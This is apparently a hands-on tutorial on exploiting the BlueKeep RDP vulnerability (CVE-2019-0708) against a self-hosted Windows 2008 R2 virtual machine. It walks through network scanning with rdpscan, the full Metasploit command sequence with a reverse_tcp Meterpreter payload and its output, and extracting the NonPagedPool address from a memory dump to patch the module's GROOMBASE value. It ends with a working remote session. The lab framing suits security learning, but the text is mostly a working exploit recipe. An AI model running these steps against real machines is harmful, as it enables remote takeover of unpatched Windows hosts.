BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol implementation. First reported in May 2019, it is present in all unpatched Windows NT-based versions of Microsoft Windows from Windows 2000 through Windows Server 2008 R2 and Windows 7.

Microsoft issued a security patch on 14 May 2019. On 13 August 2019, related BlueKeep security vulnerabilities, collectively named DejaBlue, were reported to affect newer Windows versions, including Windows 7 and all recent versions up to Windows 10 of the operating system, as well as the older Windows versions.


Remote Desktop Protocol (RDP) allows a lot of communication and interaction between the client and the server before the user being authenticated. And that is exactly what BlueKeep exploited when it burst upon the scene earlier this summer.

RDP presents a remote GUI login screen in which the user can enter their username and password. It’s during the setup of that session that BlueKeep attempts to write arbitrary code into the kernel memory of the server and then trick the server into executing it.

The attack is complicated to pull off, but there are no particular prerequisites other than an unpatched Windows 7 or 2008 R2 system with RDP (usually TCP 3389) accessible to a remote attacker.


In this article, we will see how hacker uses the BlueKeep to crash vulnerable Windows machine remotely and eventually try to inject remote code into to execute it. Before to move further and to be able to deploy this scenario, you will need the following to be present in your machine:

  • VirtualBox 5 or 6 which will host the vulnerable Windows Server.
  • A Vulnerable Windows Image Disk (You can download the Windows 2008 R2 in the official download page).
  • A Linux machine along with Metasploit installed (It can be a physical or a virtual machine).
  • RDPScan which will be used to scan our network and detect the CVE-2019-0708 vulnerability.
  • Rekall Memory Forensics which will be used to extract NPP address from RAM dump.


Install RDPScan on Ubuntu/Debian and other derived distributions

git clone
cd rdpscan
sudo make

Once RDPScan is installed, you will need to run the following command to scan your network.


Or to scan a whole subnet




This produces one of 3 results for each address scanned:

  • SAFE - If the target has determined bot be patched or at least require CredSSP/NLA
  • VULNERABLE - If the target has been confirmed to be vulnerable
  • UNKNOWN - If the target doesn't respond or has some protocol failure

When nothing exists at a target IP address, the older versions print the message "UNKNOWN - connection timed out". When scanning large networks, this produces an overload of too much information about systems you don't care about.

You can increase the speed at which it scans large networks by increasing the number of workers:

rdpscan --workers 10000


If you stand here, I'm sure you'll be impatient to open your Metasploit console to test this vulnerability. We will run Exploit the first time with the common below options to see what is happening on our victim's machine.

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4444
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

In the above configuration, the victim machine is referenced as, the attacker machine is referenced as, we use a common reverse TCP payload made especially for Windows machine and we set the target as "1" for the moment.


[*] Started reverse TCP handler on
[+] - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] - Surfing channels ...
[*] - Lobbing eggs ...
[*] - Forcing the USE of FREE\'d object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

Well done! It seems that our Exploit has completed but no meterpreter session has been created and the only thing we have been able to do on our victim's machine it's to crash it with a horrible blue screen that must have been scaring the user who was behind the screen at this time !! It's this all that we can do?



As explained in the Github conversation page of the project :

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

So, following the tips from, you will at this stage start to deal with your first issue! Let's take a moment to read the comments at the start of cve_2019_0708_bluekeep_rce.rb file that you can find on the below screenshot.



Concretely that means the current Metasploit Exploit associated with the CVE-2019-0708 currently works only if fDisableCam key is set to zero and the main problem is if the registry key still uses the default setup, we cannot exploit it. So to move further, on the target machine, you must open the Registry Editor and set the fDisableCam key to "0" as per the below screenshots.




As commented in the below screenshot, to move ahead we will need to get the correct GROOMBASE value which is the start address of the NonPagedPool area (NPP).


To do this, we will extract the NPP Address from a memory dump of the target machine which is quite easy to do since we host it. This operation can be done quickly if you are using VirtualBox. To do it, you need first to start your target machine (VM) and once you are ready to use the following commands :

VBoxManage debugvm "VM-Name" dumpvmcore --filename=vm.memdump


We will use Rekall for this operation. But if you are an expert in forensics, you can also use Volatility Framework which allows you to do the same. If Rekall is not yet installed on your machine, you can follow the below instructions. For more information about this tool, you can visit the Github page of the project.

Install/Setup Rekall Memory Forensics on Linux based from sources

sudo apt -y update
pip install virtualenv
virtualenv /tmp/MyEnv
source /tmp/MyEnv/bin/activate
git clone rekall
pip3 install --editable rekall/rekall-lib
pip3 install --editable rekall/rekall-core
pip3 install --editable rekall/rekall-agent
pip3 install --editable rekall

Install/Setup Rekall Memory Forensics from Docker

If you prefer you can use Docker to do the work, this Dockerfile represents a Docker image that encapsulates the Rekall Memory Forensic Framework. To run this image after installing Docker, use a command like this:

sudo mkdir ~/files
sudo chmod a+xwr ~/files
sudo docker run --rm -u 0 -it -v ~/files:/home/nonroot/files remnux/rekall bash

To use Rekall's web console, invoke the container with the -p parameter to give your host access to the container's TCP port 8000 like this:

sudo docker run --rm -u 0 -it -p 8000:8000 -v ~/files:/home/nonroot/files remnux/rekall

Once you are ready with one of the above Rekall setup option, simply execute the below command to extract the information we need from our VM memory dump we previously created.


rekall -f /path/to/your/dump/file.memdump pools



Waoohh !! It seems we finally found what we were looking for !! Highlighted we can see the "Start" address of the NonPagedPool that Rekall extracts from the memory dump of our virtual machine. We can now copy this value to edit the GROOMBASE parameter of the Metasploit exploit.


Depending on the operating system you are using, the path to your Metasploit directory may be different from the example described below. To find out the path of your Metasploit you can use the locate command.

sudo nano /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Find the below line and replace the GROOMBASE with the one you found in the previous step.

'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8001804000

Important: Rekall removes four 'f' at the beginning of the address string so you must add it manually to get 18 characters of length. When you are done with your file, use CTRL + x to save it, then reload all Metasploit modules using the below command.

msf5 > reload_all

You are all done !! You can start over the process of your attack on Metasploit as you did earlier but now we will also specify the GROOMSIZE value.

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4444
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 200
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit


As you can see on the above screenshot, a Meterpreter session was created allowing me now to do whatever I want on my victim's machine. Regarding the GROOMSIZE, I used 200MB since my VM is running 2 processors with 4GB of ram. But for a common virtual machine of 2GB of RAM running on one proc, the correct value could be around 50MB.